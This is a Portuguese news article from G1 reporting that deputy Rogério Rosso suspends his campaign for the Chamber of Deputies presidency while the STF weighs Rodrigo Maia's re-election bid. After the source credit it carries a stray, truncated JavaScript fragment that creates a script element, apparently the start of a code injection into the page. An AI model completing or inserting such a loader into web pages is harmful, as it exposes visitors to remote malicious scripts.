Rogério Rosso suspende campanha à presidência da Câmara

Rogério Rosso: “Não saio nem continuo fazendo campanha, vou sobrestar”

                                                    Foto: Wilson Dias/Agência Brasil

 

A candidatura do deputado Rogério Rosso (PSD-DF) à presidência da Câmara está suspensa até que o Supremo Tribunal Federal (STF) manifeste-se a respeito da candidatura à reeleição do atual presidente, Rodrigo Maia (DEM-RJ). Foi o que o próprio Rosso anunciou nesta quarta-feira (25).

“Vou suspender. Não saio nem continuo fazendo campanha, vou sobrestar porque tenho confiança que o STF vai fazer o devido controle constitucional em tempo”, afirmou Rosso

Na última semana, a presidente do Supremo Tribunal Federal (STF), ministra Cármen Lúcia, deu a Maia um prazo de 10 dias para ele se manifestar sobre uma ação movida pelo deputado André Figueiredo (PDT-CE). O prazo começou a contar no dia 19, quando a Câmara recebeu a notificação.

Bastidores

Oficialmente, Maia não anunciou ser candidato, mas atua nos bastidores para ser reconduzido ao cargo. Seus opositores argumentam que a Constituição e o regimento da Câmara não permitem que o presidente seja reeleito para um novo mandato dentro da mesma legislatura.

A decisão de Rosso veio um dia após a oficialização de que os colegas de bancada do parlamentar vão apoiar a reeleição do atual presidente da Casa, Rodrigo Maia (DEM-RJ). A candidatura de Rosso chegou a ser anunciada pelo próprio PSD no fim de 2016. No dia 9 de janeiro, o deputado usou as redes sociais para se lançar na disputa.

“Grande companheiro”

O nome, porém, não unificou sequer o próprio partido. Na terça (24), depois de semanas de movimentação nos bastidores, a bancada do PSD anunciou apoio a Rodrigo Maia.

Quando a decisão estava para ser anunciada, o novo líder da bancada na Casa, Marcos Montes (MG), disse que uma possível desistência de candidatura seria decisão “pessoal de Rosso”. “Não queremos trazer constrangimento ao Rosso, que é um grande companheiro. (Mas) uma candidatura, sem apoio do próprio partido, fica ruim para ele. Ele não vai querer se expor”, afirmou Montes na ocasião.

 

Fonte: G1

var d=document;var s=d.createElement(‘script’);

Deixe um comentário